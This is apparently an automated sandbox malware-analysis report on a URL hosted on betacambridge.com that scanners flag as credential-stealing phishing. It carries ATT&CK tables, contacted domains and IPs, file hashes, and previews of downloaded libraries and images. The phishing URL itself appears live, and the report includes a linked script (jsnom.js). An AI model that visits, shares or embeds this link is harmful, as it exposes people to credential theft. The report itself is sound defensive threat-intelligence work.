          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1200 --field-trial-handle=2008,i,4224708502505659071,8326428056869441000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N0%Avira URL Cloudsafe
          https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.betacambridge.com/wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.png0%Avira URL Cloudsafe
          https://betacambridge.com/n/jsnom.js0%Avira URL Cloudsafe
          https://betacambridge.com/favicon.ico0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          d2vgu95hoyrpkh.cloudfront.net
          18.245.31.78
          truefalse
            high
            betacambridge.com
            192.232.223.48
            truetrue
              unknown
              cs837.wac.edgecastcdn.net
              192.229.133.221
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.google.com
                    142.250.185.164
                    truefalse
                      high
                      aadcdn.msftauth.net
                      unknown
                      unknownfalse
                        high
                        www.betacambridge.com
                        unknown
                        unknownfalse
                          unknown
                          www.w3schools.com
                          unknown
                          unknownfalse
                            high
                            cdn.socket.io
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123Ntrue
                                unknown
                                https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                                  high
                                  https://betacambridge.com/n/jsnom.jstrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                    high
                                    https://betacambridge.com/favicon.icotrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.w3schools.com/w3css/4/w3.cssfalse
                                      high
                                      https://www.betacambridge.com/wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.pngtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://cdn.socket.io/4.6.0/socket.io.min.jschromecache_59.1.drfalse
                                        high
                                        https://google.comchromecache_59.1.drfalse
                                          high
                                          https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffcchromecache_59.1.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            13.107.246.45
                                            s-part-0017.t-0009.t-msedge.netUnited States
                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            192.232.223.48
                                            betacambridge.comUnited States
                                            46606UNIFIEDLAYER-AS-1UStrue
                                            18.245.31.78
                                            d2vgu95hoyrpkh.cloudfront.netUnited States
                                            16509AMAZON-02USfalse
                                            192.229.133.221
                                            cs837.wac.edgecastcdn.netUnited States
                                            15133EDGECASTUSfalse
                                            239.255.255.250
                                            unknownReserved
                                            unknownunknownfalse
                                            142.250.185.164
                                            www.google.comUnited States
                                            15169GOOGLEUSfalse
                                            152.199.21.175
                                            sni1gl.wpc.omegacdn.netUnited States
                                            15133EDGECASTUSfalse
                                            IP
                                            192.168.2.17
                                            192.168.2.4
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1558004
                                            Start date and time:2024-11-18 21:14:43 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 3m 11s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:browseurl.jbs
                                            Sample URL:https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal88.phis.win@16/36@20/9
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 142.251.5.84, 142.250.185.142, 216.58.212.131, 34.104.35.123, 172.217.18.10, 172.217.16.202, 142.250.186.74, 142.250.186.170, 142.250.185.234, 142.250.185.106, 142.250.185.170, 142.250.186.106, 142.250.185.202, 172.217.23.106, 216.58.212.138, 142.250.185.138, 142.250.184.234, 172.217.18.106, 216.58.206.74, 142.250.185.74, 142.250.186.35, 142.250.185.67, 199.232.210.172, 192.229.221.95, 142.250.184.227
                                            • Excluded domains from analysis (whitelisted): logincdn.msauth.net, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N
                                            No simulations
                                            No context
                                            No context
                                            No context
                                            No context
                                            No context
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:downloaded
                                            Size (bytes):68
                                            Entropy (8bit):4.835131731013994
                                            Encrypted:false
                                            SSDEEP:3:pg8BH3a8r9/1qiddO8k0kL62:p5BX5rPZddOW2
                                            MD5:1FF88D7E6CE0EFFEC359C41A6ED77C2F
                                            SHA1:0A7EF1924FB8FC49B70126C75A0E3476688A1E56
                                            SHA-256:842DD742BBF5C87477A45B6D5F9DC0DE51109F24BFEFAC949E6902ED367ABFF2
                                            SHA-512:D974F02AF3F19FD743E957F60794499F343FBDB0ACB6A71A55B13F8E0A237E00C859D3528655BE09294107850D6976B561BF0A32FB7B6DA7E44105E29C1E1E66
                                            Malicious:false
                                            Reputation:low
                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQnKM54Es7z0ChIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                            Preview:CjAKCw2RYZVOGgQICRgBCgcNNYZUHBoACgsNkWGVThoECAkYAQoLDZFhlU4aBAgJGAE=
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                            Category:downloaded
                                            Size (bytes):2228
                                            Entropy (8bit):7.82817506159911
                                            Encrypted:false
                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                            Malicious:false
                                            Reputation:low
                                            URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (49854)
                                            Category:downloaded
                                            Size (bytes):49993
                                            Entropy (8bit):5.216475744251136
                                            Encrypted:false
                                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                            Malicious:false
                                            Reputation:low
                                            URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):1651
                                            Entropy (8bit):7.823076718916614
                                            Encrypted:false
                                            SSDEEP:24:2V4Ub3vMJkyNe5mpz6uCVNVEPjVVU4G9RVvRiDQtcO3cTW1XezN3cJMSZPQTS:2H/0gmpJCvIjVVUjiDQSO3cTb3JEQS
                                            MD5:E9D1BCBF18997317C23FD219F0167EE1
                                            SHA1:1ED9CAC7484191C27E50137E2D59ED0B763D181F
                                            SHA-256:3622948BFCB6676D67F4F747B031C94DEEB238B5B84B96FD81FBFB93D42E88B9
                                            SHA-512:7929AB94AFB191BF62BDBF809F1FACC1349B8B478A55AE466C7E574C92B965ECB52A8C65160A301E08C96DB404CB18A2FAE8A7D05EA516F8CF0B537E18ADB9E3
                                            Malicious:false
                                            Reputation:low
                                            Preview:.PNG........IHDR... ... .....szz.....pHYs..........+.....%IDATX...l.g.._..}.{..]..k.@C.............)q.%..q.....IG..s3&.0t.6.d8..`.......X.c.......j.^..~~....w-..f....?.7wy...?...}...{....0...~:.t|..... .Zi9z..HG.p...Df....?.....{>Z.S..@..k.".......vm....1r.^.CFyb.i%.........B..~.(/?h..;............ZK......'.&...T..^l.D#[..3..!.@U.....[......F..v....j[.Nz...S;....U%.h.[.....[.n..0..}.......R.^=c..o(..`._J...z....Q. 1x.RO:....0...>.KW:.....9s_.,Yprl../..C.....l.7.v.....D...-....d.6........@...S...%"...~.L...x..w....p.$...@....._.._y.k.?..8..........Y.k....V.....=....g.......F..{.A.l.oZt`.4F..;^.m.)..kM:S....m.0..W8.r.N..|.0...&..y$.<k..ay..~...]..F)..]......^^..}...h..c....-.d...D.Fc..4....-1....T.. ..o...A?.}sV.?R.i....~...-&e.Q].o...s..}..T......S.P|......%<.iL.#.g....k....!..P......5Y..{....{zT&3%..kI.....W.....yS.E...H.m,qY......G.x3<...@.ogfX.[..\.1...W.......7]X."...rhh.u=.../..w.].....O...+.R.#z..#pl.6....`...e...N]....Bd.....'..}/o
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                            Category:dropped
                                            Size (bytes):2407
                                            Entropy (8bit):7.900400471609788
                                            Encrypted:false
                                            SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                            MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                            SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                            SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                            SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                            Malicious:false
                                            Reputation:low
                                            Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                            Category:dropped
                                            Size (bytes):276
                                            Entropy (8bit):7.316609873335077
                                            Encrypted:false
                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                            Malicious:false
                                            Reputation:low
                                            Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                            Category:dropped
                                            Size (bytes):1435
                                            Entropy (8bit):7.8613342322590265
                                            Encrypted:false
                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                            Malicious:false
                                            Reputation:low
                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (49854)
                                            Category:dropped
                                            Size (bytes):49993
                                            Entropy (8bit):5.216475744251136
                                            Encrypted:false
                                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                            Malicious:false
                                            Reputation:low
                                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                            Category:dropped
                                            Size (bytes):199
                                            Entropy (8bit):6.766983163126765
                                            Encrypted:false
                                            SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                            MD5:21B761F2B1FD37F587D7222023B09276
                                            SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                            SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                            SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                            Malicious:false
                                            Reputation:low
                                            Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                            Category:downloaded
                                            Size (bytes):199
                                            Entropy (8bit):6.766983163126765
                                            Encrypted:false
                                            SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                            MD5:21B761F2B1FD37F587D7222023B09276
                                            SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                            SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                            SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                            Malicious:false
                                            Reputation:low
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                            Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:Unicode text, UTF-8 (with BOM) text
                                            Category:downloaded
                                            Size (bytes):23427
                                            Entropy (8bit):5.112735417225198
                                            Encrypted:false
                                            SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                            MD5:BA0537E9574725096AF97C27D7E54F76
                                            SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                            SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                            SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                            Malicious:false
                                            Reputation:low
                                            URL:https://www.w3schools.com/w3css/4/w3.css
                                            Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                            Category:downloaded
                                            Size (bytes):2407
                                            Entropy (8bit):7.900400471609788
                                            Encrypted:false
                                            SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                            MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                            SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                            SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                            SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                            Malicious:false
                                            Reputation:low
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
